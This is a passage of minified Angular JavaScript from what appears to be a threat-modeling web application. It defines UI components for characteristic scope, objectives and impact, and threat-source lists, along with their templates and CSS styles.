left;",3,"min-width",4,"ngIf"],[1,"assetColumn"],[2,"margin","5px"],[2,"float","left","display","flex","justify-content","center","align-items","center"],[2,"display","block","float","left"],[2,"width","100%","display","flex","justify-content","center","align-items","center"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"isProject","assetGroup","selectedNode","nodeTreeChanged"],[1,"column1"],[1,"prop-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px"],[3,"myData","showAssetGroup"],[1,"referenceTable"],[2,"min-width","10px"],[1,"refDiagramColumn"],["class","refDiagramColumn",3,"borderColor",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",1,"buttonAsText","primary-color",3,"matTooltip","click"],["matTooltipShowDelay","1000","matBadge","!","matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below","matBadgeOverlap","false",3,"matBadgeHidden","matTooltip"],["matTooltipShowDelay","1000",1,"buttonAsText","primary-color",2,"font-size","small",3,"matTooltip","click"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-tab-group",1),he("selectedIndexChange",function(r){return i.SetSelectedTabIndex(r)}),s(3,"\n    "),m(4,"mat-tab"),s(5,"\n      "),ne(6,Jpt,2,3,"ng-template",2),s(7,"\n\n      "),ne(8,h_t,29,18,"ng-template",null,3,d1),s(10,"\n\n      "),ne(11,T_t,27,6,"ng-template",4),s(12,"\n    "),u(),s(13,"\n\n    "),m(14,"mat-tab"),s(15,"\n      "),ne(16,E_t,2,3,"ng-template",2),s(17,"\n      "),ne(18,D_t,15,18,"ng-template",4),s(19,"\n    "),u(),s(20,"\n\n    "),m(21,"mat-tab"),s(22,"\n      "),ne(23,x_t,2,3,"ng-template",2),s(24,"\n      "),ne(25,R_t,39,20,"ng-template",4),s(26,"\n    "),u(),s(27,"\n\n    "),m(28,"mat-tab"),s(29,"\n      "),ne(30,S_t,2,3,"ng-template",2),s(31,"\n      "),ne(32,F_t,43,26,"ng-template",4),s(33,"\n    "),u(),s(34,"\n  "),u(),s(35,"\n"),u()),2&e&&(C(2),V("selectedIndex",i.GetSelectedTabIndex()))},dependencies:[Zi,Ri,_1,Zh,xp,oa,Hh,da,qh,V1,Mu,Uh,es,ts,Or,Lr,rc,Xo,qo,po,Pa,df,DZ,v5,Xi],styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.property-form-field[_ngcontent-%COMP%]{width:300px}.tabGroup[_ngcontent-%COMP%]     .mat-tab-header .mat-tab-labels .mat-tab-label{height:25px}.tabGroup[_ngcontent-%COMP%]     .mat-tab-labels .mat-tab-label{min-width:120px}.disable[_ngcontent-%COMP%]{pointer-events:none}.draggable[_ngcontent-%COMP%]{cursor:pointer}.disableAsset[_ngcontent-%COMP%]{opacity:.5}.assetColumn[_ngcontent-%COMP%]{display:block;float:left}.assetButton[_ngcontent-%COMP%]{width:25px;height:25px;line-height:20px;font-size:20px}.assetButton[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:.4}.referenceTable[_ngcontent-%COMP%]{margin:10px}.referenceTable[_ngcontent-%COMP%]   table[_ngcontent-%COMP%], .referenceTable[_ngcontent-%COMP%]   th[_ngcontent-%COMP%], .referenceTable[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{border:1px solid;border-collapse:collapse}.refDiagramColumn[_ngcontent-%COMP%]{max-width:150px}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0;padding:0;cursor:pointer}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-light[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.highlight-dark[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}']}),t})();function V_t(t,a){1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.charscope.notDefined")))}function B_t(t,a){if(1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit;C(1),za("",re(2,2,"general.Notes"),": ",e.length,"")}}function H_t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",9),he("click",function(){const r=be(e).$implicit;return Me(B().selectedArray=r)}),s(1,"\n          "),m(2,"mat-icon",10),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",11),s(6),oe(7,"translate"),u(),s(8,"\n          "),ne(9,V_t,3,3,"div",12),s(10,"\n          "),ne(11,B_t,3,4,"div",12),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedArray===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedArray===e&&i.theme.IsDarkMode),C(6),ke(re(7,7,i.GetArrayName(e))),C(3),V("ngIf",0==(null==e?null:e.length)),C(2),V("ngIf",(null==e?null:e.length)>0)}}function U_t(t,a){if(1&t&&(it(0,"div",18),oe(1,"translate")),2&t){const e=B(2);at("innerHTML",re(1,1,e.GetArrayName(e.selectedArray)+".d"),Hc)}}function q_t(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"div",13),s(3,"\n          "),m(4,"mat-accordion",14),s(5,"\n            "),m(6,"mat-expansion-panel",15),s(7,"\n              "),m(8,"mat-expansion-panel-header"),s(9,"\n                "),m(10,"mat-panel-title"),s(11),oe(12,"translate"),u(),s(13,"\n                "),m(14,"mat-panel-description"),s(15),oe(16,"translate"),m(17,"mat-icon"),s(18,"info"),u(),s(19,"\n                "),u(),s(20,"\n              "),u(),s(21,"\n\n              "),ne(22,U_t,2,3,"div",16),s(23,"\n            "),u(),s(24,"\n          "),u(),s(25,"\n          "),it(26,"app-notes",17),s(27,"\n        "),u(),s(28,"\n      "),Mt()),2&t){const e=B();C(6),V("expanded",!0),C(5),ct("\n                  ",re(12,7,"general.HowTo"),"\n                "),C(4),ct("\n                  ",re(16,9,e.GetArrayName(e.selectedArray)),"\n                  "),C(7),V("ngIf",e.selectedArray),C(4),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.selectedArray)}}let G_t=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){this.arrays=[],this.charScope.StepProperties.forEach(e=>this.arrays.push(this.charScope[e]))}GetArray(e){return this.charScope.GetProperty(e)}GetArrayName(e){return"pages.modeling.charscope."+this.charScope.StepProperties[this.arrays.indexOf(e)]}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-char-scope"]],inputs:{charScope:"charScope"},decls:32,vars:11,consts:[[2,"margin","10px"],[1,"row"],[1,"column1"],[1,"prop-list"],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"click"],["mat-list-icon",""],["mat-line",""],["mat-line","",4,"ngIf"],[2,"margin-left","10px"],[1,"expansion-panel-headers-align"],[2,"margin-top","10px",3,"expanded"],[3,"innerHTML",4,"ngIf"],[3,"showTimestamp","hasCheckbox","strings"],[3,"innerHTML"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"mat-list",3),s(7,"\n        "),ne(8,H_t,13,9,"mat-list-item",4),s(9,"\n      "),u(),s(10,"\n    "),u(),s(11,"\n    "),m(12,"div",5),s(13,"\n      "),ne(14,q_t,29,11,"ng-container",6),s(15,"\n    "),u(),s(16,"\n  "),u(),s(17,"\n  "),it(18,"mat-divider"),s(19,"\n  "),m(20,"div"),s(21,"\n    "),m(22,"mat-form-field",7),s(23,"\n      "),m(24,"mat-label"),s(25),oe(26,"translate"),u(),s(27,"\n      "),m(28,"textarea",8),he("ngModelChange",function(r){return i.charScope.Description=r}),u(),s(29,"\n    "),u(),s(30,"\n  "),u(),s(31,"\n"),u()),2&e&&(C(6),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(2),V("ngForOf",i.arrays),C(6),V("ngIf",i.selectedArray),C(11),ke(re(26,9,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.charScope.Description))},dependencies:[Zi,Ri,an,Ta,Ea,oa,nn,un,Go,Xa,es,ts,Or,Lr,_p,tl,Ec,Dc,el,Il,Qp,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}']}),t})();function j_t(t,a){1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.objimpact.notDefined")))}function Q_t(t,a){if(1&t&&(m(0,"div",11),s(1),oe(2,"translate"),u()),2&t){const e=B().$implicit;C(1),za("",re(2,2,"general.Notes"),": ",e.length,"")}}function $_t(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",9),he("click",function(){const r=be(e).$implicit;return Me(B().selectedArray=r)}),s(1,"\n          "),m(2,"mat-icon",10),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",11),s(6),oe(7,"translate"),u(),s(8,"\n          "),ne(9,j_t,3,3,"div",12),s(10,"\n          "),ne(11,Q_t,3,4,"div",12),s(12,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedArray===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedArray===e&&i.theme.IsDarkMode),C(6),ke(re(7,7,i.GetArrayName(e))),C(3),V("ngIf",0==(null==e?null:e.length)),C(2),V("ngIf",(null==e?null:e.length)>0)}}function K_t(t,a){1&t&&(it(0,"div",18),oe(1,"translate")),2&t&&at("innerHTML",re(1,1,"pages.modeling.objimpact.DeviceGoals.d"),Hc)}function X_t(t,a){1&t&&(it(0,"div",18),oe(1,"translate")),2&t&&at("innerHTML",re(1,1,"pages.modeling.objimpact.BusinessGoals.d"),Hc)}function Y_t(t,a){1&t&&(it(0,"div",18),oe(1,"translate")),2&t&&at("innerHTML",re(1,1,"pages.modeling.objimpact.BusinessImpact.d"),Hc)}function J_t(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"div",13),s(3,"\n          "),m(4,"mat-accordion",14),s(5,"\n            "),m(6,"mat-expansion-panel",15),s(7,"\n              "),m(8,"mat-expansion-panel-header"),s(9,"\n                "),m(10,"mat-panel-title"),s(11),oe(12,"translate"),u(),s(13,"\n                "),m(14,"mat-panel-description"),s(15),oe(16,"translate"),m(17,"mat-icon"),s(18,"info"),u(),s(19,"\n                "),u(),s(20,"\n              "),u(),s(21,"\n\n              "),ne(22,K_t,2,3,"div",16),s(23,"\n              "),ne(24,X_t,2,3,"div",16),s(25,"\n              "),ne(26,Y_t,2,3,"div",16),s(27,"\n            "),u(),s(28,"\n          "),u(),s(29,"\n          "),it(30,"app-notes",17),s(31,"\n        "),u(),s(32,"\n      "),Mt()),2&t){const e=B();C(6),V("expanded",!0),C(5),ct("\n                  ",re(12,9,"general.HowTo"),"\n                "),C(4),ct("\n                  ",re(16,11,e.GetArrayName(e.selectedArray)),"\n                  "),C(7),V("ngIf",e.selectedArray===e.objImpact.DeviceGoals),C(2),V("ngIf",e.selectedArray===e.objImpact.BusinessGoals),C(2),V("ngIf",e.selectedArray===e.objImpact.BusinessImpact),C(4),V("showTimestamp",!1)("hasCheckbox",!1)("strings",e.selectedArray)}}let Z_t=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){this.arrays=[this.objImpact.DeviceGoals,this.objImpact.BusinessGoals,this.objImpact.BusinessImpact]}GetArray(e){return this.objImpact.GetProperty(e)}GetArrayName(e){let i="pages.modeling.objimpact.";return e==this.objImpact.DeviceGoals?i+"DeviceGoals":e==this.objImpact.BusinessGoals?i+"BusinessGoals":e==this.objImpact.BusinessImpact?i+"BusinessImpact":void 0}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-obj-impact"]],inputs:{objImpact:"objImpact"},decls:32,vars:11,consts:[[2,"margin","10px"],[1,"row"],[1,"column1"],[1,"prop-list"],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"click"],["mat-list-icon",""],["mat-line",""],["mat-line","",4,"ngIf"],[2,"margin-left","10px"],[1,"expansion-panel-headers-align"],[2,"margin-top","10px",3,"expanded"],[3,"innerHTML",4,"ngIf"],[3,"showTimestamp","hasCheckbox","strings"],[3,"innerHTML"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"div",2),s(5,"\n      "),m(6,"mat-list",3),s(7,"\n        "),ne(8,$_t,13,9,"mat-list-item",4),s(9,"\n      "),u(),s(10,"\n    "),u(),s(11,"\n    "),m(12,"div",5),s(13,"\n      "),ne(14,J_t,33,13,"ng-container",6),s(15,"\n    "),u(),s(16,"\n  "),u(),s(17,"\n  "),it(18,"mat-divider"),s(19,"\n  "),m(20,"div"),s(21,"\n    "),m(22,"mat-form-field",7),s(23,"\n      "),m(24,"mat-label"),s(25),oe(26,"translate"),u(),s(27,"\n      "),m(28,"textarea",8),he("ngModelChange",function(r){return i.objImpact.Description=r}),u(),s(29,"\n    "),u(),s(30,"\n  "),u(),s(31,"\n"),u()),2&e&&(C(6),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),C(2),V("ngForOf",i.arrays),C(6),V("ngIf",i.selectedArray),C(11),ke(re(26,9,"general.Notes")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.objImpact.Description))},dependencies:[Zi,Ri,an,Ta,Ea,oa,nn,un,Go,Xa,es,ts,Or,Lr,_p,tl,Ec,Dc,el,Il,Qp,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%]   .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%]     .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%]     .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%]   .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%]   .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();const egt=["nameBox"];function tgt(t,a){if(1&t){const e=Ye();m(0,"button",10),he("click",function(){const r=be(e).$implicit;return Me(B().AddExistingSource(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function igt(t,a){if(1&t&&(m(0,"div",24),s(1),oe(2,"translate"),oe(3,"translate"),u()),2&t){const e=B().$implicit,i=B();C(1),za("",re(2,2,"general.Likelihood"),": ",re(3,4,i.GetLMHName(e.Likelihood)),"")}}function agt(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",22),he("click",function(){const r=be(e).$implicit;return Me(B().selectedSource=r)}),s(1,"\n          "),m(2,"mat-icon",23),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",24),s(6),u(),s(7,"\n          "),ne(8,igt,4,6,"div",25),s(9,"\n          "),m(10,"button",26),he("click",function(){const r=be(e).$implicit;return Me(B().DeleteSource(r))}),oe(11,"translate"),m(12,"mat-icon"),s(13,"delete"),u()(),s(14,"\n        "),u()}if(2&t){const e=a.$implicit,i=B();Ct("highlight-light",i.selectedSource===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedSource===e&&i.theme.IsDarkMode),C(6),ke(e.GetLongName()),C(2),V("ngIf",e.Likelihood),C(2),at("matTooltip",re(11,7,"general.Delete"))}}function ngt(t,a){if(1&t){const e=Ye();m(0,"button",36),he("click",function(){return be(e),Me(B(2).selectedSource.Name="")}),oe(1,"translate"),s(2,"\n              "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n            "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function ogt(t,a){1&t&&(m(0,"mat-hint",37),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n              ",re(2,1,"messages.error.numberAlreadyExists"),"\n            "))}function rgt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n        "),m(2,"div",27),s(3,"\n          "),m(4,"mat-form-field",28),s(5,"\n            "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n            "),m(10,"input",29,30),he("ngModelChange",function(n){return be(e),Me(B().selectedSource.Name=n)}),u(),s(12,"\n            "),ne(13,ngt,6,3,"button",31),s(14,"\n          "),u(),s(15,"\n          "),m(16,"mat-form-field",32),s(17,"\n            "),m(18,"mat-label"),s(19),oe(20,"translate"),u(),s(21,"\n            "),m(22,"input",33),he("ngModelChange",function(n){return be(e),Me(B().selectedSource.Number=n)}),u(),s(23,"\n            "),ne(24,ogt,3,3,"mat-hint",34),s(25,"\n          "),u(),s(26,"\n          "),it(27,"br"),s(28,"\n          "),it(29,"app-threat-actor",35),s(30,"\n        "),u(),s(31,"\n      "),Mt()}if(2&t){const e=B();C(7),ke(re(8,9,"properties.Name")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedSource.Name),C(3),V("ngIf",e.selectedSource.Name),C(6),ke(re(20,11,"general.Number")),C(3),at("matTooltip",e.selectedSource.Number),V("ngModel",e.selectedSource.Number),C(2),V("ngIf",e.selectedSource.CheckUniqueNumber()),C(5),V("threatActor",e.selectedSource)}}let sgt=(()=>{class t{constructor(e,i){this.theme=e,this.dataService=i,this.isEdtingArray=[]}ngOnInit(){}AddSource(){let e=this.dataService.Project.CreateThreatActor();return this.threatSources.AddThreatActor(e),this.selectedSource=e,setTimeout(()=>{this.nameBox&&this.nameBox.nativeElement.select()},250),e}AddExistingSource(e){const i=this.AddSource(),n=i.Number;i.CopyFrom(e.Data),i.Number=n,i.Data.origID=e.ID}GetPossibleThreatSources(){return this.dataService.Config.GetThreatActors().filter(e=>!this.threatSources.Sources.map(i=>i.Data.origID).includes(e.ID))}DeleteSource(e){this.selectedSource==e&&(this.selectedSource=null),this.dataService.Project.DeleteThreatActor(e)}ResetNumbers(){const e=this.threatSources.Sources;for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}drop(e){Qs(this.threatSources.Data.sourceIDs,e.previousIndex,e.currentIndex)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-sources"]],viewQuery:function(e,i){if(1&e&&Mi(egt,5),2&e){let n;Vt(n=Bt())&&(i.nameBox=n.first)}},inputs:{threatSources:"threatSources"},decls:95,vars:44,consts:[[2,"margin","10px"],[1,"expansion-panel-headers-align"],[2,"margin","10px 0",3,"expanded"],[3,"innerHTML"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"float","right",3,"matMenuTriggerFor","matTooltip"],["moreMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["cdkDrag","",3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"column2"],[4,"ngIf"],["appearance","fill",2,"width","100%","margin-top","10px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["cdkDrag","",3,"click"],["mat-list-icon",""],["mat-line",""],["mat-line","",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin-left","10px"],["appearance","fill",1,"property-form-field"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["nameBox",""],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],[3,"threatActor"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-accordion",1),s(3,"\n    "),m(4,"mat-expansion-panel",2),s(5,"\n      "),m(6,"mat-expansion-panel-header"),s(7,"\n        "),m(8,"mat-panel-title"),s(9),oe(10,"translate"),u(),s(11,"\n        "),m(12,"mat-panel-description"),s(13),oe(14,"translate"),m(15,"mat-icon"),s(16,"info"),u(),s(17,"\n        "),u(),s(18,"\n      "),u(),s(19,"\n\n      "),it(20,"div",3),oe(21,"translate"),s(22,"\n    "),u(),s(23,"\n  "),u(),s(24,"\n  "),m(25,"div",4),s(26,"\n    "),m(27,"div",5),s(28,"\n      "),m(29,"mat-list",6),he("cdkDropListDropped",function(r){return i.drop(r)}),s(30,"\n        "),m(31,"div",7),s(32),oe(33,"translate"),m(34,"button",8),oe(35,"translate"),m(36,"mat-icon"),s(37,"add"),u()(),s(38,"\n          "),m(39,"mat-menu",null,9),s(41,"\n            "),m(42,"button",10),he("click",function(){return i.AddSource()}),s(43),oe(44,"translate"),u(),s(45,"\n            "),m(46,"button",11),s(47),oe(48,"translate"),u(),s(49,"\n          "),u(),s(50,"\n          "),m(51,"mat-menu",null,12),s(53,"\n            "),ne(54,tgt,2,1,"button",13),s(55,"\n          "),u(),s(56,"\n          "),m(57,"button",14),oe(58,"translate"),m(59,"mat-icon"),s(60,"more_vert"),u()(),s(61,"\n          "),m(62,"mat-menu",null,15),s(64,"\n            